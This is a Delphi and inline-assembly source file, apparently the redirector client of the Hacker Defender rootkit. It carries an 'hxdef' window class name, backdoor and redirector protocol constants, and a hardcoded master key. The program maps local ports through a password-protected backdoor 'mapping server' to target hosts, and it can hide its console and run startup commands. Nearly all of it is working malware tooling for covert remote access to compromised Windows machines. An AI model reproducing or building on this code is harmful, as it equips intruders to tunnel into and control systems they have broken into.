📄 rdrbs100.dpr
字号:
program rdrbs100;
{$APPTYPE CONSOLE}
uses Windows,USysUtils,ShellAPI,Winsock2,UList,UTCP;
{$R rdrbs100.res}
const
WindowClassName='hxdef-rdrbase-100';
WM_QUIT = $0012;
WM_LBUTTONDBLCLK = $0203;
WM_USER = $0400;
WM_TRAYNOTIFY = WM_USER+1;
WM_TRAY_END = WM_TRAYNOTIFY+1;
WM_HIDECONSOLE = WM_TRAY_END+1;
WM_MAX = WM_USER+10;
MaxMappedPorts = 1000;
ptUnknown = 0;
ptNormal = 1;
ptHTTP = 2;
WAITFOREVENTSTIMEOUT=250;
SOCK_ADDR_SIZE=SizeOf(TSockAddrIn);
MASTER_KEY_LEN=32;
BSC_INIT_REQ_1 =$E0;
BSC_INIT_RES_1 =$E1;
BSC_INIT_REQ_2 =$E2;
BSC_INIT_RES_2 =$E3;
BSC_INIT_REQ_3 =$E4;
BSC_INIT_RES_3 =$E5;
BSC_INIT_COMPLETE =$E6;
BSC_CONSOLE_INPUT =$E7;
BSC_CONSOLE_OUTPUT =$E8;
BSC_AUTHORIZATION_OK =$E9;
BSC_AUTHORIZATION_FAILED =$EA;
BSC_SERVICE_BACKDOOR =$EB;
BSC_SERVICE_REDIRECTOR =$EC;
BSC_SERVICE_TEST_REQ =$ED;
BSC_SERVICE_TEST_RES =$EE;
BSC_END_REQ =$EF;
type
TCommand=record
Name,Info,Usage:string;
end;
const
CommandsCount=19;
CommandList:array[1..CommandsCount] of TCommand=
(
(Name:'HELP';Info:'List of commands or command details.';Usage:' [COMMAND]'),
(Name:'EXIT';Info:'Kill this application. Use DIS flag to discard unsaved data.';Usage:' [DIS]'),
(Name:'CLS';Info:'Clear screen buffer.';Usage:''),
(Name:'SAVE';Info:'Save settings.';Usage:''),
(Name:'LIST';Info:'List mapped ports.';Usage:' [PAGE INDEX]'),
(Name:'OPEN';Info:'Open mapped port.';Usage:' <INDEX>'),
(Name:'CLOSE';Info:'Close mapped port.';Usage:' <INDEX>'),
(Name:'HIDE';Info:'Hide this console. (NT Only)';Usage:''),
(Name:'MPINFO';Info:'Show number of mapped and open ports.';Usage:''),
(Name:'ADD';Info:'Create mapped port. You have to specify domain when using HTTP type.';Usage:' <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]'),
(Name:'DEL';Info:'Delete mapped port.';Usage:' <INDEX>'),
(Name:'DETAIL';Info:'More info about mapped port.';Usage:' <INDEX>'),
(Name:'SULIST';Info:'List startup commands.';Usage:' [PAGE INDEX]'),
(Name:'SUADD';Info:'Add startup command.';Usage:' <INDEX>'),
(Name:'SUDEL';Info:'Delete startup command.';Usage:' <INDEX>'),
(Name:'SILENT';Info:'Display or change silent mode.';Usage:' [ON|OFF]'),
(Name:'EDIT';Info:'Edit mapped port.';Usage:' <INDEX>'),
(Name:'SUEDIT';Info:'Edit startup command.';Usage:' [ON|OFF]'),
(Name:'TEST';Info:'Test mapping server.';Usage:' <INDEX>')
);
type
TCharInfoEx=record
case Byte of
0:(UnicodeChar:WCHAR;
UAttributes:Word);
1:(AsciiChar:CHAR;
AAttributes:Word);
end;
TConsoleScreen=array[0..24,0..79] of TCharInfoEx;
TSettings=record
SilentMode:Boolean;
end;
PMappedPort=^TMappedPort;
TMappedPort=record
// ID:array[0..3] of Char;
LocalListenPort:Word;
MappingServer:TInAddr;
MappingServerPort:Word;
TargetServer:TInAddr;
TargetServerPort:Word;
AuthNum:Cardinal;
Password:array[0..15] of Char;
PortType:Word;
Domain:string;
Opened:Longbool;
end;
PStartupItem=^TStartupItem;
TStartupItem=array[0..1023] of Char;
TWindowsVersion=(wvUnknown,wvWin32s,wvWindowsNT40,wvWindows95,wvWindows95OSR2,wvWindows98,wvWindows98SE,wvWindows2000,wvWindowsMe,wvWindowsXP);
TWindowsType=(wtUnknown,wtWin32s,wtWxx,wtNT);
var
NotifyIconData:TNotifyIconData;
WindowClass:TWndClass;
Icon:HICON;
IsConsole,ReadThreadExists,AppRun,ReadThreadSuspened,IniLoaded,SilentNow:Boolean;
ConsoleScreenBuffer:TConsoleScreen;
ConsoleCursorInfo:TConsoleCursorInfo;
ConsoleScreenBufferInfo:TConsoleScreenBufferInfo;
WindowHandle,InputHandle,OutputHandle,ReadThreadHandle:THandle;
FirstCoords,SecondCoords:TCoord;
FirstRect:TSmallRect;
IniFile:string;
Settings:TSettings;
MappedPorts,StartupList:TList;
Msg:TMsg;
WSAData:TWSAData;
WindowsVersion:TWindowsVersion;
WindowsType:TWindowsType;
MasterKey:array[0..MASTER_KEY_LEN-1] of Char=#$01#$9A#$8C#$66#$AF#$C0#$4A#$11
+#$9E#$3F#$40#$88#$12#$2C#$3A#$4A
+#$84#$65#$38#$B0#$B4#$08#$0B#$AF
+#$DB#$CE#$02#$94#$34#$5F#$22#$00;
procedure ReplaceHostInHTTPPacket(var VBuffer:Pointer;var VSize:Cardinal;ADomain:Pointer);stdcall;
var
LBuf,LNew,LDom:string;
LPos:Integer;
begin
LDom:=string(ADomain);
SetLength(LBuf,VSize);
CopyMemory(Pointer(LBuf),VBuffer,VSize);
LPos:=Pos(#$0D#$0A+'HOST: ',UpCase(LBuf));
if LPos>0 then
begin
LNew:=Copy(LBuf,1,LPos+7)+LDom;
LBuf:=Copy(LBuf,LPos+7,MaxInt);
LPos:=Pos(#$0D#$0A,LBuf);
if LPos>0 then LNew:=LNew+Copy(LBuf,LPos,MaxInt);
LocalFree(Cardinal(VBuffer));
VSize:=Length(LNew);
VBuffer:=Pointer(LocalAlloc(LMEM_FIXED,VSize));
CopyMemory(VBuffer,Pointer(LNew),VSize);
end;
end;
procedure AddRedir(AListenPort:Cardinal;AMappingAddr:TInAddr;AMappingPort:Cardinal;ATerminator:Pointer;ATargetServer:TInAddr;ATargetPort:Cardinal;APortType:Cardinal;ADomain:Pointer;AAuthNum:Cardinal); stdcall; assembler;
asm
push dword ptr [ebp+028h]
push dword ptr [ebp+024h]
push dword ptr [ebp+020h]
push dword ptr [ebp+01Ch]
push dword ptr [ebp+018h]
push dword ptr [ebp+014h]
mov eax,[ebp+010h]
shl eax,010h
mov ax,[ebp+008h]
push eax
push dword ptr [ebp+00Ch]
call @Server
leave
ret 024h
@Server:
push ebp
mov ebp,esp
sub esp,034h
{
-030 - NewClient.Host.sin_family:Word
-02E - NewClient.Host.sin_port:Word
-02C - NewClient.Host.sin_addr:TInAddr
-028..-024 - NewClient.Host.sin_zero:array[0..7] of Char
-020 - NewClient.Socket:TSocket
-01C - TID:Cardinal;
-018 - ServerEventHandle:THandle
-014 - ServerHost.sin_family:Word
-012 - ServerHost.sin_port:Word
-010 - ServerHost.sin_addr:TInAddr
-00C..-008 - ServerHost.sin_zero:array[0..7] of Char
-004 - ServerSocket:TSocket
+008 - MappingServerAddr:TInAddr
+00C - ListenPort:Word
+00E - MappingServerPort:Word
+010 - Terminator:PBoolean
+014 - TargetServerAddr:TInAddr
+018 - TargetServerPort:Cardinal
+01C - PortType:Carindal
+020 - PortDomain:string
+024 - AuthNum:Cardinal
}
push esi
push edi
push ebx
xor eax,eax
mov [ebp-010h],eax
push eax
push eax
push eax
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call WSASocket
mov [ebp-004h],eax
inc eax
jz @Server_end
mov eax,[ebp+00Ch]
xchg ah,al
mov [ebp-012h],ax
mov word ptr [ebp-014h],AF_INET
push 010h
lea eax,[ebp-014h]
push eax
push dword ptr [ebp-004h]
call bind
inc eax
jz @Server_end
push SOMAXCONN
push dword ptr [ebp-004h]
call listen
jnz @Server_end
@Server_loop:
lea eax,[ebp-018h]
push eax
push [ebp-004h]
call @EventSelect
test eax,eax
jz @Server_end
push [ebp-018h]
push [ebp-004h]
call @WaitForEvents
test eax,eax
jnz @Server_proc_events
mov eax,[ebp+010h]
mov eax,[eax]
test eax,eax
jz @Server_end
push 019h
call Sleep
jmp @Server_loop
@Server_proc_events:
and eax,FD_ACCEPT
jz @Server_loop
xor eax,eax
push eax
push eax
push eax
lea eax,[ebp-030h]
push eax
push dword ptr [ebp-004h]
call WSAAccept
mov [ebp-020h],eax
inc eax
jz @Server_loop
push 030h
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @Server_close_newsock
mov ecx,[ebp-020h]
mov [eax],ecx
lea esi,[ebp-030h]
lea edi,[eax+004h]
movsd
movsd
movsd
movsd
lea esi,[ebp+008h]
movsd
movsd
add esi,004h
push 005h
pop ecx
rep movsd
lea edx,[ebp-01Ch]
push edx
push ecx
push eax
push offset @NewClientThread
push ecx
push ecx
call CreateThread
jmp @Server_loop
@Server_close_newsock:
push dword ptr [ebp-020h]
call CloseSocket
jmp @Server_loop
@Server_end:
push 050h
call Sleep
mov eax,[ebp+010h]
push 000h
pop dword ptr [eax]
push dword ptr [ebp-018h]
call WSACloseEvent
push dword ptr [ebp-004h]
call CloseSocket
leave
ret 008h
@EventSelect:
call WSACreateEvent
test eax,eax
jz @EventSelect_fail
mov ecx,[esp+008h]
mov [ecx],eax
push FD_ALL_EVENTS
push eax
push [esp+00Ch]
call WSAEventSelect
inc eax
jnz @EventSelect_end
@EventSelect_fail:
xor eax,eax
@EventSelect_end:
ret 008h
@WaitForEvents:
push ebp
mov ebp,esp
sub esp,02Ch
//LFucker
{ push 0109h //Lfucker
call Sleep //Lfucker}
call @PeekMessages
{ @WaitForEvents_PM_loop:
push PM_REMOVE
push 000h
push 000h
push 000h
lea eax,[ebp-02Ch]
push eax
call PeekMessageA
test eax,eax
jnz @WaitForEvents_PM_loop}
//LFucker
push 000h
push WAITFOREVENTSTIMEOUT
push 000h
lea eax,[ebp+00Ch]
push eax
push 1
call WSAWaitForMultipleEvents
inc eax
jz @WaitForEvents_end
sub eax,WSA_WAIT_TIMEOUT+1
jz @WaitForEvents_end
lea eax,[ebp-02Ch]
push eax
push dword ptr [ebp+00Ch]
push dword ptr [ebp+008h]
call WSAEnumNetworkEvents
inc eax
jz @WaitForEvents_end
mov eax,[ebp-02Ch]
@WaitForEvents_end:
leave
jmp @EventSelect_end
@NewClientThread:
mov ebp,esp
sub esp,070h
{
-070 - RedirThreadHandle:THandle
-06C - ClientThreadHandle:THandle
-068 - Redir.ThreadArgs.MainItem:PTcpItem
-064 - Redir.ThreadArgs.OtherItem:PTcpItem
-060 - Redir.ThreadArgs.ThreadType:Cardinal
-05C - Redir.ThreadArgs.Events:Longint
-058 - Redir.ThreadArgs.EventHandle:THandle
-054 - Redir.ThreadArgs.Active:Boolean
-050 - Redir.ThreadArgs.Host.sin_family:Word
-04E - Redir.ThreadArgs.Host.sin_port:Word
-04C - Redir.ThreadArgs.Host.sin_addr:TInAddr
-048..-044 - Redir.ThreadArgs.Host.sin_zero:array[0..7] of Char
-040 - Redir.ThreadArgs.Socket
-038 - Redir.ThreadID:Cardinal
-034 - Client.ThreadArgs.MainItem:PTcpItem
-030 - Client.ThreadArgs.OtherItem:PTcpItem
-02C - Client.ThreadArgs.ThreadType:Cardinal
-028 - Client.ThreadArgs.Events:Longint
-024 - Client.ThreadArgs.EventHandle:THandle
-020 - Client.ThreadArgs.Active:Boolean
-01C - Client.ThreadArgs.Host.sin_family:Word
-01A - Client.ThreadArgs.Host.sin_port:Word
-018 - Client.ThreadArgs.Host.sin_addr:TInAddr
-014..-010 - Client.ThreadArgs.Host.sin_zero:array[0..7] of Char
-00C - Client.ThreadArgs.Socket
-008 - Client.ThreadArgs.Connected
-004 - Client.ThreadID:Cardinal
+004 - AArgs:Pointer
+000 AArgs.NewSocket
+004 AArgs.NewHost.sin_family:Word
+006 AArgs.NewHost.sin_port:Word
+008 AArgs.NewHost.sin_addr:TInAddr
+00C..+010 AArgs.NewHost.sin_zero:array[0..7] of Char
+014 AArgs.MappingServerAddr:TInAddr
+018 AArgs.ListenPort:Word
+01A AArgs.MappingServerPort:Word
+01C AArgs.TargetServerAddr
+020 AArgs.TargetServerPort
+024 AArgs.PortType
+028 AArgs.Domain
+02C AArgs.AuthNum
}
xor eax,eax
lea edi,[ebp-070h]
push 01Ch
pop ecx
rep stosd
push eax
push eax
push eax
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call WSASocket
mov [ebp-00Ch],eax
inc eax
jz @NewClientThread_close_newsock
push 001h
pop eax
mov [ebp-020h],eax
mov [ebp-054h],eax
mov [ebp-060h],eax
mov edx,[ebp+004h]
movzx eax,word ptr [edx+01Ah]
xchg ah,al
mov [ebp-01Ah],ax
mov word ptr [ebp-01Ch],AF_INET
mov eax,[edx+014h]
mov [ebp-018h],eax
mov eax,[edx]
mov [ebp-040h],eax
lea esi,[edx+004h]
lea edi,[ebp-050h]
movsd
movsd
movsd
movsd
lea eax,[ebp-058h]
push eax
push dword ptr [ebp-040h]
call @EventSelect
test eax,eax
jz @NewClientThread_close_clientsock
lea eax,[ebp-068h]
mov [ebp-030h],eax
mov [ebp-068h],eax
lea eax,[ebp-034h]
mov [ebp-034h],eax
mov [ebp-064h],eax
lea eax,[ebp-004h]
push eax
push 000h
lea eax,[ebp-034h]
push eax
push offset @ThreadProc
push 000h
push 000h
call CreateThread
test eax,eax
jz @NewClientThread_close_clientsock
mov [ebp-06Ch],eax
push 019h
call Sleep
lea eax,[ebp-038h]
push eax
push 000h
lea eax,[ebp-068h]
push eax
push offset @ThreadProc
push 000h
push 000h
call CreateThread
test eax,eax
jz @NewClientThread_term_clientthread
mov [ebp-070h],eax
push -001h
push 000h
lea eax,[ebp-070h]
push eax
push 2
call WaitForMultipleObjects
xor eax,eax
mov [ebp-054h],eax
mov [ebp-020h],eax
mov [ebp-008h],eax
push 032h
call Sleep
push dword ptr [ebp-040h]
call CloseSocket
push dword ptr [ebp-00Ch]
call CloseSocket
push 0FAh
call Sleep
push 000h
push dword ptr [ebp-070h]
call TerminateThread
@NewClientThread_term_clientthread:
push 000h
push dword ptr [ebp-06Ch]
call TerminateThread
@NewClientThread_close_clientsock:
push dword ptr [ebp-00Ch]
call CloseSocket
push dword ptr [ebp-058h]
call CloseHandle
push dword ptr [ebp-024h]
call CloseHandle
@NewClientThread_close_newsock:
mov eax,[ebp+004h]
push dword ptr [eax]
call CloseSocket
push dword ptr [ebp+004h]
call LocalFree
push 000h
call ExitThread
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -